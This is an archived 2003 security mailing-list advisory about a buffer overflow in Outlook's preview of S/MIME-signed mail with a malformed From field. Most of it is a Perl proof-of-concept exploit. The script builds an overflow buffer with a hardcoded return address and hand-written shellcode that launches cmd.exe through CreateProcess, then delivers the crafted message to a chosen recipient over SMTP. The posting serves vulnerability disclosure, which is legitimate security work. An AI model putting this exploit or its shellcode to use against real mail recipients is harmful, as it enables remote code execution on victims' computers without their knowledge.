[EXPL] Outlook Remote Code Execution in Preview Pane (S/MIME, PoC)

From: support@securiteam.com
Date: 01/29/03

  • Next message: support@securiteam.com: "[UNIX] Multiple Vulnerabilities in Old Releases of MIT Kerberos"
    From: support@securiteam.com
    To: list@securiteam.com
    Date: 29 Jan 2003 11:39:01 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      Outlook Remote Code Execution in Preview Pane (S/MIME, PoC)
    ------------------------------------------------------------------------

    SUMMARY

    As we reported in the past
    <http://www.securiteam.com/windowsntfocus/6D00B005PU.html> Outlook Remote
    Code Execution in Preview Pane (S/MIME), a vulnerability in Outlook
    Express allows a remote attacker to cause the program to automatically
    execute arbitrary whenever a user clicks on an email that contains a
    malformed From field. Ironically, the vulnerability occurs because Outlook
    tries to display the malformed field inside a warning message, causing an
    internal buffer overflow.

    DETAILS

    Exploit:
    # (The exploit code will not work straight out of the "box")
    # Noam Rathaus - Beyond Security Ltd.'s SecurITeam
    # Note the certificate is a valid one for noamr@beyondsecurity.com issued
    by Thawe.

    # Message (buffer) starts at 0006F578 (circa)
    # Message (buffer) ends at 0006F94C (circa)

    # The problem lies here:
    #
    # 5F26F339 mov ebx,dword ptr [eax]
    # .
    # .
    # 5F26F354 call dword ptr [ebx+10h]
    # .
    # .
    # Now since we control the EAX, but we can't provide it with NULLs, we
    must find somewhere in the
    # kernel memory a place that has the following number (of our buffer), for
    example:
    #
    # We found 00 06 F5 A4 at 5F1835C7
    #
    # Windows 2000 SP3 Internet Explorer 5.5
    #
    # So our 5F1835C7 is placed in EAX, which has this memory content 0006F5A4
    # Causing our MOV to place in EBX the the following content 00 06 F5 A4.
    # The final EIP call goes out to 0006F5B4, this is where our arbitrary
    code lies.
    #

    use Getopt::Std;
    use IO::Socket::INET;
    use MIME::Base64;

    getopt('tfhi');

    if (!$opt_f || !$opt_t || !$opt_h)
    {
      print "Usage: malformed_email.pl <-t to> <-f from> <-h smtphost> <-i
    start number>\r\nstart size should be bigger than 100\r\n";
      exit;
    }

    # 1234567890123456789012345612345678901234567890123456
    $buffer = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"x11; # 584
    $buffer = join ('', $buffer, "123456789012");

    #$addr = "\x34\xF3\x26\x5F";
    #$addr = "\xC7\x35\x18\x5F"; # points to 0006F5A4

    $addr = "\x9F\x37\xD4\x77"; # points to 0006F3C0

    $buffer = join ('', $buffer, $addr); # used by the mov EBX, [EAX]

    # 6 lines = 6*26 # This is to place our code in the right place
    # + 8 = 164 # Calculation done accordigly.
    # + 10h = 16 + 164 = 180

    $buffer = join ('', $buffer, "A"x180); # We move our buffer to the right
    place.

    #$buffer = join ('', $buffer, "\xC3\xAF\x01\x78"); # address of cmd.exe
    (This will just run CMD.exe,
    #$buffer = join ('', $buffer, "A"x$opt_i); # but will get stuck)

    # A lot neater shellcode for cmd.exe

    $buffer = join ('', $buffer, "\x55"); # push ebp
    $buffer = join ('', $buffer, "\x54"); # push esp
    $buffer = join ('', $buffer, "\x5D"); # pop ebp
    $buffer = join ('', $buffer, "\x33\xFF"); # xor edi,edi
    $buffer = join ('', $buffer, "\x57"); # push edi
    $buffer = join ('', $buffer, "\xC6\x45\xFC\x63"); # mov byte ptr
    [ebp-04h],'c'
    $buffer = join ('', $buffer, "\xC6\x45\xFD\x6D"); # mov byte ptr
    [ebp-03h],'m'
    $buffer = join ('', $buffer, "\xC6\x45\xFE\x64"); # mov byte ptr
    [ebp-02h],'d'
    $buffer = join ('', $buffer, "\x57"); # push edi
    $buffer = join ('', $buffer, "\xC6\x45\xF8\x03"); # mov byte
    ptr[ebp-08h],3 ;Max window
    $buffer = join ('', $buffer, "\x8D\x45\xFC"); # lea eax,[ebp-4h]
    $buffer = join ('', $buffer, "\x50"); # push eax
    $buffer = join ('', $buffer, "\xB8\x7E\x68\x4C\x67"); # mov
    eax,7E684C67h ;CreateProcess@77E684C6h
    $buffer = join ('', $buffer, "\xC1\xC8\x04"); # ror eax, 4
    $buffer = join ('', $buffer, "\xFF\xD0"); # call eax
    $buffer = join ('', $buffer, "\xB8\x7E\xB8\x54\xB7"); # mov
    eax,7EB854B7h ;FatalExit@77EB854Bh
    $buffer = join ('', $buffer, "\xC1\xC8\x04"); # ror eax, 4
    $buffer = join ('', $buffer, "\xFF\xD0"); # call eax
    $buffer = join ('', $buffer, "A"x$opt_i);

    $sock = IO::Socket::INET->new(PeerAddr => "$opt_h",PeerPort => '25', Proto
    => 'tcp');
    unless (<$sock> =~ "220") { die "Not a SMTP Server?" }
    print "Connected\r\n";

    print $sock "HELO you\r\n";

    unless (<$sock> =~ "250") { die "HELO failed" }

    print "MAIL FROM: $opt_f\r\n";
    print $sock "MAIL FROM: $opt_f\r\n";
    sleep(1);

    unless (<$sock> =~ "250") { die "MAIL FROM failed" }
    print "RCPT TO: $opt_t\r\n";
    print $sock "RCPT TO: $opt_t\r\n";
    sleep(1);

    unless (<$sock> =~ "250") { print $sock "RCPT TO: <$opt_t>\r\n"; unless
    (<$sock> =~ "250") { die "RCPT TO failed" } }
    print $sock "DATA\r\n";
    unless (<$sock> =~ "354") { die "DATA failed" }
    sleep(1);

    $lengthy = length($buffer);

    print "Test #$temp, [$buffer], ", length($buffer), "\n";

    print $sock <<EOF;
    From: $buffer\r
    To: $opt_t\r
    Subject: Test #$temp - $lengthy\r
    Date: Wed, 31 Jul 2002 16:05:00 -0300\r
    MIME-Version: 1.0\r
    Content-Type: multipart/signed;\r
            micalg=SHA1;\r
            protocol="application/x-pkcs7-signature";\r
            boundary="----=_NextPart_000_002A_01C238AC.03ECDBE0"\r
    \r
    This is a multi-part message in MIME format.\r
    \r
    ------=_NextPart_000_002A_01C238AC.03ECDBE0\r
    Content-Type: text/plain;\r
            charset="iso-8859-1"\r
    Content-Transfer-Encoding: quoted-printable\r
    \r
    Test\r
    \r
    \r
    ------=_NextPart_000_002A_01C238AC.03ECDBE0\r
    Content-Type: application/x-pkcs7-signature;\r
            name="smime.p7s"\r
    Content-Transfer-Encoding: base64\r
    Content-Disposition: attachment;\r
            filename="smime.p7s"\r
    \r
    MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIII7DCCAoow\r
    ggHzoAMCAQICAwgkVjANBgkqhkiG9w0BAQQFADCBkjELMAkGA1UEBhMCWkExFTATBgNVBAgTDFdl\r
    c3Rlcm4gQ2FwZTESMBAGA1UEBxMJQ2FwZSBUb3duMQ8wDQYDVQQKEwZUaGF3dGUxHTAbBgNVBAsT\r
    FENlcnRpZmljYXRlIFNlcnZpY2VzMSgwJgYDVQQDEx9QZXJzb25hbCBGcmVlbWFpbCBSU0EgMjAw\r
    MC44LjMwMB4XDTAyMDgyMzIwMDcwN1oXDTAzMDgyMzIwMDcwN1owSjEfMB0GA1UEAxMWVGhhd3Rl\r
    IEZyZWVtYWlsIE1lbWJlcjEnMCUGCSqGSIb3DQEJARYYbm9hbXJAYmV5b25kc2VjdXJpdHkuY29t\r
    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCniCtFVDYtv7D7EWVI0nA6uiFyz30SNveNkuKI\r
    lRctvHPp0bYq3MzcVfFiGBNVKDIQ+vboffupwsLQMqXiLxBLCUvDktZa7GwgIr7yuqI8RiW/Hy3J\r
    i5SsyiGIdQzTgd/azB6k3jWLZd6iEEprsqm18sQ1EQd6FDdaa8/xtFiL2QIDAQABozUwMzAjBgNV\r
    HREEHDAagRhub2FtckBiZXlvbmRzZWN1cml0eS5jb20wDAYDVR0TAQH/BAIwADANBgkqhkiG9w0B\r
    AQQFAAOBgQAqlzpT9/02prGZioJOqlSl+Msv7RwGx6jUTyySta6Tc3KDjL3v8iZ4GUWrN+K/jmLv\r
    O1V3e6VTgYP8gRq+BsDcPoDX8ZTC8WqzGWIREsAlGciYskI/XuthQltXfh3hCOEsXU48fspivAxA\r
    pOuAxaYtX6jO5eNeJ/eGxqyySVgRCzCCAykwggKSoAMCAQICAQwwDQYJKoZIhvcNAQEEBQAwgdEx\r
    CzAJBgNVBAYTAlpBMRUwEwYDVQQIEwxXZXN0ZXJuIENhcGUxEjAQBgNVBAcTCUNhcGUgVG93bjEa\r
    MBgGA1UEChMRVGhhd3RlIENvbnN1bHRpbmcxKDAmBgNVBAsTH0NlcnRpZmljYXRpb24gU2Vydmlj\r
    ZXMgRGl2aXNpb24xJDAiBgNVBAMTG1RoYXd0ZSBQZXJzb25hbCBGcmVlbWFpbCBDQTErMCkGCSqG\r
    SIb3DQEJARYccGVyc29uYWwtZnJlZW1haWxAdGhhd3RlLmNvbTAeFw0wMDA4MzAwMDAwMDBaFw0w\r
    MjA4MjkyMzU5NTlaMIGSMQswCQYDVQQGEwJaQTEVMBMGA1UECBMMV2VzdGVybiBDYXBlMRIwEAYD\r
    VQQHEwlDYXBlIFRvd24xDzANBgNVBAoTBlRoYXd0ZTEdMBsGA1UECxMUQ2VydGlmaWNhdGUgU2Vy\r
    dmljZXMxKDAmBgNVBAMTH1BlcnNvbmFsIEZyZWVtYWlsIFJTQSAyMDAwLjguMzAwgZ8wDQYJKoZI\r
    hvcNAQEBBQADgY0AMIGJAoGBAN4zMqZjxwklRT7SbngnZ4HF2ogZgpcO40QpimM1Km1wPPrcrvfu\r
    dG8wvDOQf/k0caCjbZjxw0+iZdsN+kvx1t1hpfmFzVWaNRqdknWoJ67Ycvm6AvbXsJHeHOmr4BgD\r
    qHxDQlBRh4M88Dm0m1SKE4f/s5udSWYALQmJ7JRr6aFpAgMBAAGjTjBMMCkGA1UdEQQiMCCkHjAc\r
    MRowGAYDVQQDExFQcml2YXRlTGFiZWwxLTI5NzASBgNVHRMBAf8ECDAGAQH/AgEAMAsGA1UdDwQE\r
    AwIBBjANBgkqhkiG9w0BAQQFAAOBgQBzG28mZYv/FTRLWWKK7US+ScfoDbuPuQ1qJipihB+4h2N0\r
    HG23zxpTkUvhzeY42e1Q9DpsNJKs5pKcbsEjAcIJp+9LrnLdBmf1UG8uWLi2C8FQV7XsHNfvF7bV\r
    iJu3ooga7TlbOX00/LaWGCVNavSdxcORL6mWuAU8Uvzd6WIDSDCCAy0wggKWoAMCAQICAQAwDQYJ\r
    KoZIhvcNAQEEBQAwgdExCzAJBgNVBAYTAlpBMRUwEwYDVQQIEwxXZXN0ZXJuIENhcGUxEjAQBgNV\r
    BAcTCUNhcGUgVG93bjEaMBgGA1UEChMRVGhhd3RlIENvbnN1bHRpbmcxKDAmBgNVBAsTH0NlcnRp\r
    ZmljYXRpb24gU2VydmljZXMgRGl2aXNpb24xJDAiBgNVBAMTG1RoYXd0ZSBQZXJzb25hbCBGcmVl\r
    bWFpbCBDQTErMCkGCSqGSIb3DQEJARYccGVyc29uYWwtZnJlZW1haWxAdGhhd3RlLmNvbTAeFw05\r
    NjAxMDEwMDAwMDBaFw0yMDEyMzEyMzU5NTlaMIHRMQswCQYDVQQGEwJaQTEVMBMGA1UECBMMV2Vz\r
    dGVybiBDYXBlMRIwEAYDVQQHEwlDYXBlIFRvd24xGjAYBgNVBAoTEVRoYXd0ZSBDb25zdWx0aW5n\r
    MSgwJgYDVQQLEx9DZXJ0aWZpY2F0aW9uIFNlcnZpY2VzIERpdmlzaW9uMSQwIgYDVQQDExtUaGF3\r
    dGUgUGVyc29uYWwgRnJlZW1haWwgQ0ExKzApBgkqhkiG9w0BCQEWHHBlcnNvbmFsLWZyZWVtYWls\r
    QHRoYXd0ZS5jb20wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBANRp19SwlGRbcelH2AxRtupy\r
    kbCEXn0tDY97Et+FJXUodDpCLGMnn5V7S+9+GYcdhuqj3bnOlmQawhRuRKx85o/oTQ9xH0A4pgCj\r
    h3j2+ZSGXq3qwF5269kUo11uenwMpUtVfwYZKX+emibVars4JAhqmMex2qOYkf152+VaxBy5AgMB\r
    AAGjEzARMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQEEBQADgYEAx+ySfk749ZalZ2IqpPBN\r
    EWDQb41gWGGsJrtSNVwIzzD7qEqWih9iQiOMFw/0umScF6xHKd+dmF7SbGBxXKKs3Hnj524ARx+1\r
    DSjoAp3kmv0T9KbZfLH43F8jJgmRgHPQFBveQ6mDJfLmnC8Vyv6mq4oHdYsM3VGEa+T40c53ooEx\r
    ggH+MIIB+gIBATCBmjCBkjELMAkGA1UEBhMCWkExFTATBgNVBAgTDFdlc3Rlcm4gQ2FwZTESMBAG\r
    A1UEBxMJQ2FwZSBUb3duMQ8wDQYDVQQKEwZUaGF3dGUxHTAbBgNVBAsTFENlcnRpZmljYXRlIFNl\r
    cnZpY2VzMSgwJgYDVQQDEx9QZXJzb25hbCBGcmVlbWFpbCBSU0EgMjAwMC44LjMwAgMIJFYwCQYF\r
    Kw4DAhoFAKCBujAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwGCSqGSIb3DQEJBTEPFw0wMjA4\r
    MjMyMTEwNDRaMCMGCSqGSIb3DQEJBDEWBBRD9XX8J/0AYeJY3zpPIdPQTvsSdzBbBgkqhkiG9w0B\r
    CQ8xTjBMMAoGCCqGSIb3DQMHMA4GCCqGSIb3DQMCAgIAgDANBggqhkiG9w0DAgIBQDAHBgUrDgMC\r
    BzANBggqhkiG9w0DAgIBKDAHBgUrDgMCHTANBgkqhkiG9w0BAQEFAASBgJqFZrTmAcNoODUFKapu\r
    b09XY3dR/Frb6LScoOT8mJk28PIgxTMzxw7IKgdb40IzcsgoJniCRY+wBcBO4nwKXV+KnTgM1RNX\r
    ppw3Wm7KUqusD+K7rSFbchaJ0mkefEn/ueN7CWV/Gbe/TpnGQ/nu2CzmrLxQyWlnITcS+xwVTv0b\r
    AAAAAAAA\r
    \r
    ------=_NextPart_000_002A_01C238AC.03ECDBE0--\r
    \r\n\r\n.\r\n\r
    EOF
    print "Send complete\r\n";
    sleep(1);

    print $sock "QUIT\r\n";
    sleep(1);
    close($sock);
    print "Disconnected\r\n";

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:noamr@beyondsecurity.com>
    Noam Rathaus of SecurITeam Experts.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



    Relevant Pages

    • [EXPL] Bypassing Content Filtering Software (Exploit)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Filtering Software, flaws in several e-mail filtering products allow ... Outlook/OE will sometimes give an attachment that has no ... print $sock "HELO you\r\n"; ...
      (Securiteam)
    • Re: The honest truth about stereo
      ... >> full name for security. ... I wonder who he believes I'm a sock for. ... I find this part of the discussion to be quite funny. ... Prev by Date: ...
      (rec.audio.opinion)
    • Re: Diary of a Madman
      ... I never know which sock I am any way. ... The world's biggest arms suppliers are the US, UK, Russia, France and ... They are also the five permanent members of the UN Security ... Council. ...
      (uk.local.southwest)
    • [NT] MHTML vulnerability in Outlook Express
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A vulnerability in Outlook Express allows an attacker to run code of the ... If an attacker were to host a malicious website that contained an MHTML ...
      (Securiteam)
    • [VulnWatch] Bypassing SMTP Content Protection with a Flick of a Button
      ... How about using Outlook Express as ... more than an Outlook Express client and employs a rarely-used feature ... This RFC documented feature called "Message Fragmentation and ... comprehensive security policy to restrict potentially harmful content ...
      (VulnWatch)